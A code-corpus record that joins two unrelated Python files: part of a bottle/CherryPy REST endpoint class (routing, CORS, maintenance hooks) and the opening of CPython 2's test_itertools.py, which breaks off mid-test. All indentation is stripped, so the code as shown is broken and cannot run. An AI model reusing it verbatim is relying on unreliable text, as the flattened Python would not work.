:return: whether or not this endpoint is open with an actively listening REST server.
"""
return not (self.__server is None)
def open(self, correlation_id: Optional[str]):
"""
Opens a connection using the parameters resolved by the referenced connection resolver and creates a REST server (service) using the set options and parameters.
:param correlation_id: (optional) transaction id to trace execution through call chain.
"""
if self.is_open():
return
connection = self.__connection_resolver.resolve(correlation_id)
if connection is None:
raise ConfigException(correlation_id, "NO_CONNECTION", "Connection for REST client is not defined")
self.__uri = connection.get_as_string('uri')
# verify https with bottle
certfile = None
keyfile = None
if connection.get_as_string_with_default('protocol', 'http') == 'https':
certfile = connection.get_as_nullable_string('ssl_crt_file')
keyfile = connection.get_as_nullable_string('ssl_key_file')
# Create instance of bottle application
self.__service = SessionMiddleware(bottle.Bottle(catchall=True, autojson=True)).app
self.__service.config['catchall'] = True
self.__service.config['autojson'] = True
# Enable CORS requests
self.__service.add_hook('after_request', self.__enable_cors)
self.__service.add_hook('after_request', self.__do_maintance)
self.__service.add_hook('after_request', self.__no_cache)
self.__service.add_hook('before_request', self.__add_compatibility)
# Register routes
# self.__perform_registrations()
def start_server():
self.__service.run(server=self.__server, debug=self._debug)
# self.__perform_registrations()
host = connection.get_as_string('host')
port = connection.get_as_integer('port')
# Starting service
try:
self.__server = SSLCherryPyServer(host=host, port=port, certfile=certfile, keyfile=keyfile)
# Start server in thread
Thread(target=start_server, daemon=True).start()
# Time for start server
time.sleep(0.01)
# Give 2 sec for initialization
self.__connection_resolver.register(correlation_id)
self.__logger.debug(correlation_id, f"Opened REST service at {self.__uri}", )
self.__perform_registrations()
except Exception as ex:
self.__server = None
raise ConnectionException(correlation_id, 'CANNOT_CONNECT', 'Opening REST service failed') \
.wrap(ex).with_details('url', self.__uri)
def close(self, correlation_id: Optional[str]):
"""
Closes this endpoint and the REST server (service) that was opened earlier.
:param correlation_id: (optional) transaction id to trace execution through call chain.
"""
try:
if not (self.__server is None):
self.__server.shutdown()
self.__service.close()
self.__logger.debug(
correlation_id, f"Closed REST service at {self.__uri}")
self.__server = None
self.__service = None
self.__uri = None
except Exception as ex:
self.__logger.warn(correlation_id, "Failed while closing REST service: " + str(ex))
def register(self, registration: IRegisterable):
"""
Registers a registerable object for dynamic endpoint discovery.
:param registration: the registration to add.
"""
self.__registrations.append(registration)
def unregister(self, registration: IRegisterable):
"""
Unregisters a registerable object, so that it is no longer used in dynamic endpoint discovery.
:param registration: the registration to remove.
"""
self.__registrations.remove(registration)
def __perform_registrations(self):
for registration in self.__registrations:
registration.register()
def __fix_route(self, route: str) -> str:
if route is not None and len(route) > 0:
if route[0] != '/':
route = f'/{route}'
return route
return ''
def register_route(self, method: str, route: str, schema: Schema, handler: Callable):
"""
Registers an action in this objects REST server (service) by the given method and route.
:param method: the HTTP method of the route.
:param route: the route to register in this object's REST server (service).
:param schema: the schema to use for parameter validation.
:param handler: the action to perform at the given route.
"""
method = method.upper()
# if method == 'DELETE':
# method = 'DEL'
route = self.__fix_route(route)
def wrapper(*args, **kwargs):
try:
if isinstance(schema, Schema):
params = self.__get_data() or {}
params.update(kwargs)
correlation_id = None if not params else params.get('correlation_id')
schema.validate_and_throw_exception(correlation_id, params, False)
return handler(*args, **kwargs)
except Exception as ex:
# hack the redirect response in bottle
if isinstance(ex, bottle.HTTPResponse):
handler(*args, **kwargs)
return HttpResponseSender.send_error(ex)
self.__service.route(route, method, wrapper)
def __get_data(self) -> Optional[dict]:
result = {}
if request.json or request.query:
for k, v in request.query.dict.items():
result[k] = ''.join(v)
if request.json is not None and request.json != 'null':
json_body = request.json if not isinstance(request.json, str) else json.loads(
request.json)
result.update({'body': json_body})
return result
else:
return None
def __enable_cors(self):
response.headers['Access-Control-Max-Age'] = '5'
response.headers['Access-Control-Allow-Origin'] = ', '.join(self.__allowed_origins)
response.headers['Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'
response.headers[
'Access-Control-Allow-Headers'] = ', '.join(self.__allowed_headers)
def __do_maintance(self):
"""
:return: maintenance error code
"""
# Make this more sophisticated
if self.__maintenance_enabled:
response.headers['Retry-After'] = 3600
response.status = 503
def __no_cache(self):
"""
Prevents IE from caching REST requests
"""
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Pragma'] = 'no-cache'
response.headers['Expires'] = 0
def __add_compatibility(self):
def inner(name):
if request.query:
param = request.query[name]
if param:
return param
if request.body:
param = request.json[name]
if param:
return param
if request.params:
param = request.params[name]
if param:
return param
return None
request['param'] = inner
request['route'] = {'params': request.params}
def get_param(self, param, default=None):
return request.params.get(param, default)
def get_correlation_id(self) -> Optional[str]:
"""
Returns correlationId from request
:returns: Returns correlationId from request
"""
correlation_id = bottle.request.query.get('correlation_id')
if correlation_id is None or correlation_id == '':
correlation_id = bottle.request.headers.get('correlation_id')
return correlation_id
def register_route_with_auth(self, method: str, route: str, schema: Schema, authorize: Callable, action: Callable):
"""
Registers an action with authorization in this objects REST server (service)
by the given method and route.
:param method: the HTTP method of the route.
:param route: the route to register in this object's REST server (service).
:param schema: the schema to use for parameter validation.
:param authorize: the authorization interceptor
:param action: the action to perform at the given route.
"""
def action_with_authorize(*args, **kwargs):
# hack to pass the parameters in authorizer
bottle.request.params['kwargs'] = kwargs
# bottle.request.params['args'] = args
authorize()
return next_action(*args, **kwargs)
if authorize:
next_action = action
action = action_with_authorize
self.register_route(method, route, schema, action)
def register_interceptor(self, route: str, action: Callable):
"""
Registers a middleware action for the given route.
:param route: the route to register in this object's REST server (service).
:param action: the middleware action to perform at the given route.
"""
route = self.__fix_route(route)
def intercept_handler():
match = re.match('.*' + route, request.url) is not None
if route is not None and route != '' and not match:
pass
else:
return action()
self.__service.add_hook('before_request', intercept_handler)
|
test_itertools.py
|
import unittest
from test import test_support
from itertools import *
import weakref
from decimal import Decimal
from fractions import Fraction
import sys
import operator
import random
import copy
import pickle
from functools import reduce
try:
import threading
except ImportError:
threading = None
maxsize = test_support.MAX_Py_ssize_t
minsize = -maxsize-1
def onearg(x):
'Test function of one argument'
return 2*x
def errfunc(*args):
'Test function that raises an error'
raise ValueError
def gen3():
'Non-restartable source sequence'
for i in (0, 1, 2):
yield i
def isEven(x):
'Test predicate'
return x%2==0
def isOdd(x):
'Test predicate'
return x%2==1
class StopNow:
'Class emulating an empty iterable.'
def __iter__(self):
return self
def next(self):
raise StopIteration
def take(n, seq):
'Convenience function for partially consuming a long of infinite iterable'
return list(islice(seq, n))
def prod(iterable):
return reduce(operator.mul, iterable, 1)
def fact(n):
'Factorial'
return prod(range(1, n+1))
class TestBasicOps(unittest.TestCase):
def test_chain(self):
def chain2(*iterables):
'Pure python version in the docs'
for it in iterables:
for element in it:
yield element
for c in (chain, chain2):
self.assertEqual(list(c('abc', 'def')), list('abcdef'))
self.assertEqual(list(c('abc')), list('abc'))
self.assertEqual(list(c('')), [])
self.assertEqual(take(4, c('abc', 'def')), list('abcd'))
self.assertRaises(TypeError, list,c(2, 3))
def test_chain_from_iterable(self):
self.assertEqual(list(chain.from_iterable(['abc', 'def'])), list('abcdef'))
self.assertEqual(list(chain.from_iterable(['abc'])), list('abc'))
self.assertEqual(list(chain.from_iterable([''])), [])
self.assertEqual(take(4, chain.from_iterable(['abc', 'def'])), list('abcd'))
self.assertRaises(TypeError, list, chain.from_iterable([2, 3]))
def test_combinations(self):
self.assertRaises(TypeError, combinations, 'abc') # missing r argument
self.assertRaises(TypeError, combinations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, combinations, None) # pool is not iterable
self.assertRaises(ValueError, combinations, 'abc', -2) # r is negative
self.assertEqual(list(combinations('abc', 32)), []) # r > n
self.assertEqual(list(combinations(range(4), 3)),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
def combinations1(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
if r > n:
return
indices = range(r)
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != i + n - r:
break
else:
return
indices[i] += 1
for j in range(i+1, r):
indices[j] = indices[j-1] + 1
yield tuple(pool[i] for i in indices)
def combinations2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in permutations(range(n), r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def combinations3(iterable, r):
'Pure python version from cwr()'
pool = tuple(iterable)
n = len(pool)
for indices in combinations_with_replacement(range(n), r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(combinations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) // fact(r) // fact(n-r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for c in result:
self.assertEqual(len(c), r) # r-length combinations
self.assertEqual(len(set(c)), r) # no duplicate elements
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(list(c),
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(combinations1(values, r))) # matches first pure python version
self.assertEqual(result, list(combinations2(values, r))) # matches second pure python version
self.assertEqual(result, list(combinations3(values, r))) # matches second pure python version
@test_support.bigaddrspacetest
def test_combinations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations("AA", 2**29)
@test_support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_tuple_reuse(self):
self.assertEqual(len(set(map(id, combinations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(combinations('abcde', 3))))), 1)
def test_combinations_with_replacement(self):
cwr = combinations_with_replacement
self.assertRaises(TypeError, cwr, 'abc') # missing r argument
self.assertRaises(TypeError, cwr, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, cwr, None) # pool is not iterable
self.assertRaises(ValueError, cwr, 'abc', -2) # r is negative
self.assertEqual(list(cwr('ABC', 2)),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def cwr1(iterable, r):
'Pure python version shown in the docs'
# number items returned: (n+r-1)! / r! / (n-1)! when n>0
pool = tuple(iterable)
n = len(pool)
if not n and r:
return
indices = [0] * r
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != n - 1:
break
else:
return
indices[i:] = [indices[i] + 1] * (r - i)
yield tuple(pool[i] for i in indices)
def cwr2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in product(range(n), repeat=r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def numcombs(n, r):
if not n:
return 0 if r else 1
return fact(n+r-1) // fact(r) // fact(n-1)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(cwr(values, r))
self.assertEqual(len(result), numcombs(n, r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
regular_combs = list(combinations(values, r)) # compare to combs without replacement
if n == 0 or r <= 1:
self.assertEqual(result, regular_combs) # cases that should be identical
else:
self.assertTrue(set(result) >= set(regular_combs)) # rest should be supersets of regular combs
for c in result:
self.assertEqual(len(c), r) # r-length combinations
noruns = [k for k,v in groupby(c)] # combo without consecutive repeats
self.assertEqual(len(noruns), len(set(noruns))) # no repeats other than consecutive
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(noruns,
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(cwr1(values, r))) # matches first pure python version
self.assertEqual(result, list(cwr2(values, r))) # matches second pure python version
@test_support.bigaddrspacetest
def test_combinations_with_replacement_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations_with_replacement("AA", 2**30)
@test_support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_with_replacement_tuple_reuse(self):
cwr = combinations_with_replacement
self.assertEqual(len(set(map(id, cwr('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(cwr('abcde', 3))))), 1)
def test_permutations(self):
self.assertRaises(TypeError, permutations) # too few arguments
self.assertRaises(TypeError, permutations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, permutations, None) # pool is not iterable
self.assertRaises(ValueError, permutations, 'abc', -2) # r is negative
self.assertEqual(list(permutations('abc', 32)), []) # r > n
self.assertRaises(TypeError, permutations, 'abc', 's') # r is not an int or None
self.assertEqual(list(permutations(range(3), 2)),
[(0,1), (0,2), (1,0), (1,2), (2,0), (2,1)])
def permutations1(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
if r > n:
return
indices = range(n)
cycles = range(n, n-r, -1)
yield tuple(pool[i] for i in indices[:r])
while n:
for i in reversed(range(r)):
cycles[i] -= 1
if cycles[i] == 0:
indices[i:] = indices[i+1:] + indices[i:i+1]
cycles[i] = n - i
else:
j = cycles[i]
indices[i], indices[-j] = indices[-j], indices[i]
yield tuple(pool[i] for i in indices[:r])
break
else:
return
def permutations2(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
for indices in product(range(n), repeat=r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(permutations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) // fact(n-r)) # right number of perms
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for p in result:
self.assertEqual(len(p), r) # r-length permutations
self.assertEqual(len(set(p)), r) # no duplicate elements
self.assertTrue(all(e in values for e in p)) # elements taken from input iterable
self.assertEqual(result, list(permutations1(values, r))) # matches first pure python version
self.assertEqual(result, list(permutations2(values, r))) # matches second pure python version
if r == n:
self.assertEqual(result, list(permutations(values, None))) # test r as None
self.assertEqual(result, list(permutations(values))) # test default r
@test_support.bigaddrspacetest
def test_permutations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
permutations("A", 2**30)
@test_support.impl_detail("tuple reuse is specific to CPython")
def test_permutations_tuple_reuse(self):
self.assertEqual(len(set(map(id, permutations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(permutations('abcde', 3))))), 1)
def test_combinatorics(self):
# Test relationships between product(), permutations(),
# combinations() and combinations_with_replacement().
for n in range(6):
s = 'ABCDEFG'[:n]
for r in range(8):
prod = list(product(s, repeat=r))
cwr = list(combinations_with_replacement(s, r))
perm = list(permutations(s, r))
comb = list(combinations(s, r))
# Check size
self.assertEqual(len(prod), n**r)
self.assertEqual(len(cwr), (fact(n+r-1) // fact(r) // fact(n-1)) if n else (not r))
self.assertEqual(len(perm), 0 if r>n else fact(n) // fact(n-r))
self.assertEqual(len(comb), 0 if r>n else fact(n) // fact(r) // fact(n-r))
# Check lexicographic order without repeated tuples
self.assertEqual(prod, sorted(set(prod)))
self.assertEqual(cwr, sorted(set(cwr)))
self.assertEqual(perm, sorted(set(perm)))
self.assertEqual(comb, sorted(set(comb)))
# Check interrelationships
self.assertEqual(cwr, [t for t in prod if sorted(t)==list(t)]) # cwr: prods which are sorted
self.assertEqual(perm, [t for t in prod if len(set(t))==r]) # perm: prods with no dups
self.assertEqual(comb, [t for t in perm if sorted(t)==list(t)]) # comb: perms that are sorted
self.assertEqual(comb, [t for t in cwr if len(set(t))==r]) # comb: cwrs without dups
self.assertEqual(comb, filter(set(cwr).__contains__, perm)) # comb: perm that is a cwr
self.assertEqual(comb, filter(set(perm).__contains__, cwr)) # comb: cwr that is a perm
self.assertEqual(comb, sorted(set(cwr) & set(perm))) # comb: both a cwr and a perm
def test_compress(self):
self.assertEqual(list(compress(data='ABCDEF', selectors=[1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [0,0,0,0,0,0])), list(''))
self.assertEqual(list(compress('ABCDEF', [1,1,1,1,1,1])), list('ABCDEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1])), list('AC'))
self.assertEqual(list(compress('ABC', [0,1,1,1,1,1])), list('BC'))
n = 10000
data = chain.from_iterable(repeat(range(6), n))
selectors = chain.from_iterable(repeat((0, 1)))
self.assertEqual(list(compress(data, selectors)), [1,3,5] * n)
self.assertRaises(TypeError, compress, None, range(6)) # 1st arg not iterable
self.assertRaises(TypeError, compress, range(6), None) # 2nd arg not iterable
self.assertRaises(TypeError, compress, range(6)) # too few args
self.assertRaises(TypeError, compress, range(6), None) # too many args
def test_count(self):
self.assertEqual(zip('abc',count()), [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(zip('abc',count(3)), [('a', 3), ('b', 4), ('c', 5)])
self.assertEqual(take(2, zip('abc',count(3))), [('a', 3), ('b', 4)])
self.assertEqual(take(2, zip('abc',count(-1))), [('a', -1), ('b', 0)])
self.assertEqual(take(2, zip('abc',count(-3))), [('a', -3), ('b', -2)])
self.assertRaises(TypeError, count, 2, 3, 4)
self.assertRaises(TypeError, count, 'a')
self.assertEqual(take(10, count(maxsize-5)), range(maxsize-5, maxsize+5))
self.assertEqual(take(10, count(-maxsize-5)), range(-maxsize-5, -maxsize+5))
self.assertEqual(take(3, count(3.25)), [3.25, 4.25, 5.25])
self.assertEqual(take(3, count(3.25-4j)), [3.25-4j, 4.25-4j, 5.25-4j])
self.assertEqual(take(3, count(Decimal('1.1'))),
[Decimal('1.1'), Decimal('2.1'), Decimal('3.1')])
self.assertEqual(take(3, count(Fraction(2, 3))),
[Fraction(2, 3), Fraction(5, 3), Fraction(8, 3)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(BIGINT)), [BIGINT, BIGINT+1, BIGINT+2])
c = count(3)
self.assertEqual(repr(c), 'count(3)')
c.next()
self.assertEqual(repr(c), 'count(4)')
c = count(-9)
self.assertEqual(repr(c), 'count(-9)')
c.next()
self.assertEqual(next(c), -8)
self.assertEqual(repr(count(10.25)), 'count(10.25)')
self.assertEqual(repr(count(10.0)), 'count(10.0)')
self.assertEqual(type(next(count(10.0))), float)
for i in (-sys.maxint-5, -sys.maxint+5 ,-10, -1, 0, 10, sys.maxint-5, sys.maxint+5):
# Test repr (ignoring the L in longs)
r1 = repr(count(i)).replace('L', '')
r2 = 'count(%r)'.__mod__(i).replace('L', '')
self.assertEqual(r1, r2)
# check copy, deepcopy, pickle
for value in -3, 3, sys.maxint-5, sys.maxint+5:
c = count(value)
self.assertEqual(next(copy.copy(c)), value)
self.assertEqual(next(copy.deepcopy(c)), value)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertEqual(next(pickle.loads(pickle.dumps(c, proto))), value)
def test_count_with_stride(self):
self.assertEqual(zip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(zip('abc',count(start=2,step=3)),
[('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(zip('abc',count(step=-1)),
[('a', 0), ('b', -1), ('c', -2)])
self.assertRaises(TypeError, count, 'a', 'b')
self.assertEqual(zip('abc',count(2,0)), [('a', 2), ('b', 2), ('c', 2)])
self.assertEqual(zip('abc',count(2,1)), [('a', 2), ('b', 3), ('c', 4)])
self.assertEqual(zip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(zip('abc',count(2,1L)), [('a', 2), ('b', 3), ('c', 4)])
self.assertEqual(zip('abc',count(2,3L)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(take(20, count(maxsize-15, 3)), take(20, range(maxsize-15, maxsize+100, 3)))
self.assertEqual(take(20, count(-maxsize-15, 3)), take(20, range(-maxsize-15,-maxsize+100, 3)))
self.assertEqual(take(3, count(10, maxsize+5)),
range(10, 10+3*(maxsize+5), maxsize+5))
self.assertEqual(take(3, count(2, 1.25)), [2, 3.25, 4.5])
self.assertEqual(take(3, count(2, 3.25-4j)), [2, 5.25-4j, 8.5-8j])
self.assertEqual(take(3, count(Decimal('1.1'), Decimal('.1'))),
[Decimal('1.1'), Decimal('1.2'), Decimal('1.3')])
self.assertEqual(take(3, count(Fraction(2,3), Fraction(1,7))),
[Fraction(2,3), Fraction(17,21), Fraction(20,21)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(step=BIGINT)), [0, BIGINT, 2*BIGINT])
self.assertEqual(repr(take(3, count(10, 2.5))), repr([10, 12.5, 15.0]))
c = count(3, 5)
self.assertEqual(repr(c), 'count(3, 5)')
c.next()
self.assertEqual(repr(c), 'count(8, 5)')
c = count(-9, 0)
self.assertEqual(repr(c), 'count(-9, 0)')
c.next()
self.assertEqual(repr(c), 'count(-9, 0)')
c = count(-9, -3)
self.assertEqual(repr(c), 'count(-9, -3)')
c.next()
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(count(10.5, 1.25)), 'count(10.5, 1.25)')
self.assertEqual(repr(count(10.5, 1)), 'count(10.5)') # suppress step=1 when it's an int
self.assertEqual(repr(count(10.5, 1.00)), 'count(10.5, 1.0)') # do show float values lilke 1.0
self.assertEqual(repr(count(10, 1.00)), 'count(10, 1.0)')
c = count(10, 1.0)
self.assertEqual(type(next(c)), int)
self.assertEqual(type(next(c)), float)
for i in (-sys.maxint-5, -sys.maxint+5 ,-10, -1, 0, 10, sys.maxint-5, sys.maxint+5):
for j in (-sys.maxint-5, -sys.maxint+5 ,-10, -1, 0, 1, 10, sys.maxint-5, sys.maxint+5):
# Test repr (ignoring the L in longs)
r1 = repr(count(i, j)).replace('L', '')
if j == 1:
r2 = ('count(%r)' % i).replace('L', '')
else:
r2 = ('count(%r, %r)' % (i, j)).replace('L', '')
self.assertEqual(r1, r2)
def test_cycle(self):
self.assertEqual(take(10, cycle('abc')), list('abcabcabca'))
self.assertEqual(list(cycle('')), [])
self.assertRaises(TypeError, cycle)
self.assertRaises(TypeError, cycle, 5)
self.assertEqual(list(islice(cycle(gen3()),10)), [0,1,2,0,1,2,0,1,2,0])
def test_groupby(self):
# Check whether it accepts arguments correctly
self.assertEqual([], list(groupby([])))
self.assertEqual([], list(groupby([], key=id)))
self.assertRaises(TypeError, list, groupby('abc', []))
self.assertRaises(TypeError, groupby, None)
self.assertRaises(TypeError, groupby, 'abc', lambda x:x, 10)
# Check normal input
s = [(0, 10, 20), (0, 11,21), (0,12,21), (1,13,21), (1,14,22),
(2,15,22), (3,16,23), (3,17,23)]
dup = []
for k, g in groupby(s, lambda r:r[0]):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested case
dup = []
for k, g in groupby(s, lambda r:r[0]):
for ik, ig in groupby(g, lambda r:r[2]):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check case where inner iterator is not used
keys = [k for k, g in groupby(s, lambda r:r[0])]
expectedkeys = set([r[0] for r in s])
self.assertEqual(set(keys), expectedkeys)
self.assertEqual(len(keys), len(expectedkeys))
# Exercise pipes and filters style
s = 'abracadabra'
# sort s | uniq
r = [k for k, g in groupby(sorted(s))]
self.assertEqual(r, ['a', 'b', 'c', 'd', 'r'])
# sort s | uniq -d
r = [k for k, g in groupby(sorted(s)) if list(islice(g,1,2))]
self.assertEqual(r, ['a', 'b', 'r'])
# sort s | uniq -c
r = [(len(list(g)), k) for k, g in groupby(sorted(s))]
self.assertEqual(r, [(5, 'a'), (2, 'b'), (1, 'c'), (1, 'd'), (2, 'r')])
# sort s | uniq -c | sort -rn | head -3
r = sorted([(len(list(g)) , k) for k, g in groupby(sorted(s))], reverse=True)[:3]
self.assertEqual(r, [(5, 'a'), (2, 'r'), (2, 'b')])
# iter.next failure
class ExpectedError(Exception):
pass
def delayed_raise(n=0):
for i in range(n):
yield 'yo'
raise ExpectedError
def gulp(iterable, keyp=None, func=list):
return [func(g) for k, g in groupby(iterable, keyp)]
# iter.next failure on outer object
self.assertRaises(ExpectedError, gulp, delayed_raise(0))
# iter.next failure on inner object
self.assertRaises(ExpectedError, gulp, delayed_raise(1))
# __cmp__ failure
class DummyCmp:
def __cmp__(self, dst):
raise ExpectedError
s = [DummyCmp(), DummyCmp(), None]
# __cmp__ failure on outer object
self.assertRaises(ExpectedError, gulp, s, func=id)
# __cmp__ failure on inner object
self.assertRaises(ExpectedError, gulp, s)
# keyfunc failure
def keyfunc(obj):
if keyfunc.skip > 0:
keyfunc.skip -= 1
return obj
else:
raise ExpectedError
# keyfunc failure on outer object
keyfunc.skip = 0
self.assertRaises(ExpectedError, gulp, [None], keyfunc)
keyfunc.skip = 1
self.assertRaises(ExpectedError, gulp, [None, None], keyfunc)
def test_ifilter(self):
self.assertEqual(list(ifilter(isEven, range(6))), [0,2,4])
self.assertEqual(list(ifilter(None, [0,1,0,2,0])), [1,2])
self.assertEqual(list(ifilter(bool, [0,1,0,2,0])), [1,2])
self.assertEqual(take(4, ifilter(isEven, count())), [0,2,4,6])
self.assertRaises(TypeError, ifilter)
self.assertRaises(TypeError, ifilter, lambda x:x)
self.assertRaises(TypeError, ifilter, lambda x:x, range(6), 7)
self.assertRaises(TypeError, ifilter, isEven, 3)
self.assertRaises(TypeError, ifilter(range(6), range(6)).next)
def test_ifilterfalse(self):
self.assertEqual(list(ifilterfalse(isEven, range(6))), [1,3,5])
self.assertEqual(list(ifilterfalse(None, [0,1,0,2,0])), [0,0,0])
self.assertEqual(list(ifilterfalse(bool, [0,1,0,2,0])), [0,0,0])
self.assertEqual(take(4, ifilterfalse(isEven, count())), [1,3,5,7])
self.assertRaises(TypeError, ifilterfalse)
self.assertRaises(TypeError, ifilterfalse, lambda x:x)
self.assertRaises(TypeError, ifilterfalse, lambda x:x, range(6), 7)
self.assertRaises(TypeError, ifilterfalse, isEven, 3)
self.assertRaises(TypeError, ifilterfalse(range(6), range(6)).next)
def test_izip(self):
ans = [(x,y) for x, y in izip('abc',count())]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(list(izip('abc', range(6))), zip('abc', range(6)))
self.assertEqual(list(izip('abcdef', range(3))), zip('abcdef', range(3)))
self.assertEqual(take(3,izip('abcdef', count())), zip('abcdef', range(3)))
self.assertEqual(list(izip('abcdef')), zip('abcdef'))
self.assertEqual(list(izip()), zip())
self.assertRaises(TypeError, izip, 3)
self.assertRaises(TypeError, izip, range(3), 3)
self.assertEqual([tuple(list(pair)) for pair in izip('abc', 'def')],
zip('abc', 'def'))
self.assertEqual([pair for pair in izip('abc', 'def')],
zip('abc', 'def'))
@test_support.impl_detail("tuple reuse is specific to CPython")
def test_izip_tuple_reuse(self):
ids = map(id, izip('abc', 'def'))
self.assertEqual(min(ids), max(ids))
ids = map(id, list(izip('abc', 'def')))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
def test_iziplongest(self):
for args in [
['abc', range(6)],
[range(6), 'abc'],
[range(1000), range(2000,2100), range(3000,3050)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500), range(0)],
]:
# target = map(None, *args) <- this raises a py3k warning
# this is the replacement:
target = [tuple([arg[i] if i < len(arg) else None for arg in args])
for i in range(max(map(len, args)))]
self.assertEqual(list(izip_longest(*args)), target)
self.assertEqual(list(izip_longest(*args, **{})), target)
target = [tuple((e is None and 'X' or e) for e in t) for t in target] # Replace None fills with 'X'
self.assertEqual(list(izip_longest(*args, **dict(fillvalue='X'))), target)
self.assertEqual(take(3,izip_longest('abcdef', count())), zip('abcdef', range(3))) # take 3 from infinite input
self.assertEqual(list(izip_longest()), zip())
self.assertEqual(list(izip_longest([])), zip([]))
self.assertEqual(list(izip_longest('abcdef')), zip('abcdef'))
self.assertEqual(list(izip_longest('abc', 'defg', **{})),
zip(list('abc') + [None], 'defg')) # empty keyword dict
self.assertRaises(TypeError, izip_longest, 3)
self.assertRaises(TypeError, izip_longest, range(3), 3)
for stmt in [
"izip_longest('abc', fv=1)",
"izip_longest('abc', fillvalue=1, bogus_keyword=None)",
]:
try:
eval(stmt, globals(), locals())
except TypeError:
pass
else:
self.fail('Did not raise Type in: ' + stmt)
self.assertEqual([tuple(list(pair)) for pair in izip_longest('abc', 'def')],
zip('abc', 'def'))
self.assertEqual([pair for pair in izip_longest('abc', 'def')],
zip('abc', 'def'))
@test_support.impl_detail("tuple reuse is specific to CPython")
def test_izip_longest_tuple_reuse(self):
ids = map(id, izip_longest('abc', 'def'))
self.assertEqual(min(ids), max(ids))
ids = map(id, list(izip_longest('abc', 'def')))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
def test_bug_7244(self):
class Repeater(object):
# this class is similar to itertools.repeat
def __init__(self, o, t, e):
self.o = o
self.t = int(t)
self.e = e
def __iter__(self): # its iterator is itself
return self
def next(self):
if self.t > 0:
self.t -= 1
return self.o
else:
raise self.e
# Formerly this code in would fail in debug mode
# with Undetected Error and Stop Iteration
r1 = Repeater(1, 3, StopIteration)
r2 = Repeater(2, 4, StopIteration)
def run(r1, r2):
result = []
for i, j in izip_longest(r1, r2, fillvalue=0):
with test_support.captured_output('stdout'):
print (i, j)
result.append((i, j))
return result
self.assertEqual(run(r1, r2), [(1,2), (1,2), (1,2), (0,2)])
# Formerly, the RuntimeError would be lost
# and StopIteration would stop as expected
r1 = Repeater(1, 3, RuntimeError)
r2 = Repeater(2, 4, StopIteration)
it = izip_longest(r1, r2, fillvalue=0)
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertRaises(RuntimeError, next, it)
def test_product(self):
for args, result in [
([], [()]), # zero iterables
